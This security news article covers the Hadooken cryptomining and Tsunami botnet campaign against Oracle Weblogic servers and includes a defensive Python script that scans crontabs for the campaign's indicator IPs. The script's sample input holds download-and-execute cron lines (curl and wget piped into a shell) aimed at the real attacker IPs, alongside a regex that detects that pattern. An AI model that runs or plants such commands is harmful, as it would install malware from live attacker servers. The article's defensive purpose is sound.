A New Campaign of Linux Malware Exploits Oracle Weblogic for Cryptocurrency Mining
A new campaign of malware aimed at Linux systems has been discovered by cybersecurity researchers. Its primary objective is to mine digital currency illicitly.
The attack specifically targets the Oracle Weblogic server and aims to distribute a malicious software named Hadooken, as stated by the cybersecurity company Aqua.
“Upon execution of Hadooken, it installs a Tsunami malware and deploys a cryptocurrency miner,” said security researcher Assaf Morag in a recent report.
The breach pathways capitalize on well-known security flaws and misconfigurations, such as vulnerable login details, to establish an initial presence and run unauthorized commands on vulnerable platforms.
This operation includes the simultaneous activation of two similar payloads, one coded in Python and the other as a shell script. These payloads are tasked with fetching the Hadooken malware from an external server (“89.185.85[.]102” or “185.174.136[.]204”).
“Additionally, the shell script variant scans through various folders containing SSH data (like user passwords, host specifics, and confidential data) and leverages this data to target vulnerable servers,” emphasized Morag.
“Subsequently, it moves horizontally throughout the organization or interconnected environments to further extend the reach of the Hadooken malware.”
Hadooken features two integral elements – a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet named Tsunami (also known as Kaiten), which has a track record of targeting Jenkins and Weblogic infrastructures within Kubernetes clusters.
Moreover, the malware ensures continual presence on the system by creating cron tasks to run the cryptocurrency miner at different intervals.
Aqua highlighted that the IP address 89.185.85[.]102 is associated with Aeza International LTD (AS210644) based in Germany, with a preceding study by Uptycs in February 2024 connecting it to an 8220 Gang cryptocurrency-mining campaign that exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center.
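The two behaviours described above, payloads that download Hadooken from the listed servers and cron jobs that keep the miner running, both leave traces in crontab entries. The following triage script is an added example written for this article, not code from Aqua or from the Hadooken write-up: it parses crontab text, flags commands that reference the two published indicator IPs (in plain or defanged `[.]` form), and flags the generic download-and-execute shape (curl/wget piped into a shell) that such droppers use. The crontab content at the bottom is constructed sample input; the IP list is the one quoted from the report.

```python
import re

# Indicator IPs quoted in the Aqua report summarized above (refanged for matching).
HADOOKEN_IOC_IPS = {"89.185.85.102", "185.174.136.204"}

# Generic dropper shape: curl or wget whose output is piped straight into sh/bash.
DOWNLOAD_EXEC_RE = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(text):
    """Turn the defanged '[.]' notation used in reports back into real dots."""
    return text.replace("[.]", ".")


def extract_ips(text):
    """Return the set of IPv4 addresses found in text (defanged or not)."""
    return set(IPV4_RE.findall(refang(text)))


def parse_crontab_line(line):
    """Split one crontab line into (schedule, command).

    Returns None for blank lines, comments and environment assignments
    such as SHELL=/bin/sh. Handles both 5-field schedules and @reboot-style
    shortcuts.
    """
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    first = stripped.split()[0]
    if "=" in first:            # environment assignment, not a job
        return None
    if first.startswith("@"):   # @reboot, @hourly, ...
        parts = stripped.split(None, 1)
        return (parts[0], parts[1] if len(parts) > 1 else "")
    parts = stripped.split(None, 5)
    if len(parts) < 6:
        return None
    return (" ".join(parts[:5]), parts[5])


def triage_crontab(text):
    """Return a list of suspicious jobs, each with its schedule, command and reasons."""
    findings = []
    for line in text.splitlines():
        parsed = parse_crontab_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = []
        if extract_ips(command) & HADOOKEN_IOC_IPS:
            reasons.append("ioc_ip")
        if DOWNLOAD_EXEC_RE.search(command):
            reasons.append("download_exec")
        if reasons:
            findings.append({"schedule": schedule, "command": command,
                             "reasons": sorted(reasons)})
    return findings


# Constructed sample crontab: two benign jobs and two that mimic the reported behaviour.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -s http://89.185.85.102/c | sh
@reboot wget -q -O - http://185.174.136[.]204/x | bash
30 1 * * 0 /opt/backup/run.sh
"""

if __name__ == "__main__":
    for hit in triage_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(hit['reasons'])}] {hit['schedule']} -> {hit['command']}")
```

On a real host the input would be the output of `crontab -l` for each user plus the files under `/etc/cron.d`; the IoC set is the place to merge in any further indicators from the report, and the download-and-execute pattern is deliberately generic so it also catches jobs that have been re-pointed at a server not on the list.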

The second IP address 185.174.136[.]204, currently inactive, is also associated with Aeza Group Ltd. (AS216246). As discussed in a post from July 2024 by Qurium and EU DisinfoLab, Aeza operates as a provider of uncensorable hosting services with servers in Moscow M9 and two data centers in Frankfurt.
“The operational methods of Aeza and its rapid expansion can be attributed to their recruitment of young programmers linked to uncensorable hosting providers in Russia that provide protection for cyber crimes,” stated the researchers in their report.